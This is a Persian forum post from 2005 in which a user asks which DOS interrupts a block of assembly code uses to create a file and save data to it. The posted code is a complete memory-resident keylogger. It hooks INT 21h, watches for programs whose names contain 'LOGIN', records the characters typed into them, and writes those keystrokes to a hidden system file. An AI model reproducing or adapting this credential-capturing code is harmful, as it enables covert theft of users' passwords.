آژانس هواپیمایی
tanki

تشخيص كد (اسمبلي)

شروع موضوع توسط if1361 ‏9 آگوست 2005 در انجمن برنامه نویسی

 1. if1361

  if1361 کاربر تازه وارد

  تاریخ عضویت:
  ‏7 ژوئن 2005
  نوشته ها:
  20
  تشکر شده:
  0
  با سلام
  كسي ميتونه متوجه بشه كه در كد زير به چه شيوه اي يك فايل ايجاد ميشود وسپس اطلاعات save ميگردد.منظورم تشخيص اينتراپت بكار رفته است.

  cseg segment
  assume cs:cseg,ds:cseg
  org 100h
  public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
  public cntr,lits,begin
  .RADIX 16
  start:
  push cs
  push cs
  push cs
  pop ds
  pop es
  mov ax,0fffeh
  CLI
  pop ss
  mov sp,ax
  STI
  jmp begin
  oi21 dd ?
  ac dw 0
  ob dw 80h dup (?)
  buff2 db 80h dup (?)
  fn db 'c:\testing',0FF,'.tmp',0
  search1 db 'LOGIN'
  foundf db 0
  fh dw 0
  flag db 0
  cntr dw 0

  ni21:
  assume cs:cseg,ds:nothing,es:nothing

  cmp ax,4b00h
  je exec
  cmp foundf,0ffh
  jne nc
  cmp ah,8
  je oc
  cmp ah,7
  je oc


  nc:
  push ax
  mov al,cs:flag
  not al
  cmp al,0
  jne jtov
  mov ax,cntr
  inc ax
  mov cntr,ax
  cmp ax,31h
  jb jtov
  xor ax,ax
  mov cntr,ax
  mov flag,al
  pop ax
  pushf
  call dword ptr [oi21]
  push ds
  push cs
  pop ds
  push ax
  push bx
  push cx
  push dx
  jmp short wpwtf
  jtov:
  pop ax
  jmp dword ptr cs:[oi21]
  exec: call scanfor
  jmp nc
  oc:

  pushf
  call dword ptr cs:[oi21]
  assume ds:cseg
  push ds
  push cs
  pop ds
  push ax
  push bx
  push cx
  push dx
  mov bx,ac
  mov [bx],al
  inc bx
  mov [ac],bx
  cmp al,0dh
  jne lethro
  mov byte ptr [bx],0ah
  not cs:[flag]
  lethro:
  pop dx
  pop cx
  pop bx
  pop ax
  pop ds
  iret

  scanfor:
  push ax
  push di
  push si
  push es
  push ds
  push cs
  push cs
  pop es
  mov si,dx
  mov di,offset buff2
  moveit:
  lodsb
  and al,0dfh
  stosb
  or al,al
  jnz moveit
  pop ds
  mov di,offset buff2
  look:
  push di
  mov si,offset search1
  mov cx,5
  repe cmpsb
  pop di
  or cx,cx
  jz foundit
  inc di
  cmp byte ptr [di+5],0
  je not_found
  jmp look
  not_found:
  xor ax,ax
  mov foundf,al
  jmp short endofsearch
  foundit:
  mov ax,0ffh
  mov foundf,al
  endofsearch:
  pop ds
  pop es
  pop si
  pop di
  pop ax
  ret


  wpwtf:
  mov ax,3d02h
  mov dx,offset fn
  pushf
  call dword ptr [oi21]
  jnc exist
  cmp al,2
  je create
  jmp lethro
  create:
  mov ah,3ch
  mov dx,offset fn
  mov cx,02h+04h
  pushf
  call dword ptr [oi21]
  jnc exist
  jmp lethro
  exist:
  mov fh,ax
  mov bx,ax
  mov ax,4202h
  xor cx,cx
  xor dx,dx
  pushf
  call dword ptr[oi21]
  mov cx,[ac]
  mov dx,offset ob
  sub cx,dx
  mov [ac],dx
  inc cx
  mov bx,fh
  mov ah,40h
  pushf
  call dword ptr [oi21]
  mov ah,3eh
  mov bx,fh
  pushf
  call dword ptr [oi21]
  jmp lethro


  lits db 90h
  begin:
  mov ax,offset ob
  mov [ac],ax
  mov ax,3521h
  int 21h
  mov di,offset oi21
  mov [di],bx
  mov [di+2],es
  mov dx,offset ni21
  push cs
  pop ds
  mov ax,2521h
  int 21h
  mov dx,offset lits
  int 27h
  cseg ends
  end start​
   
avanak همکاری در فروش عسل طبیعی و گرده گل ایرانی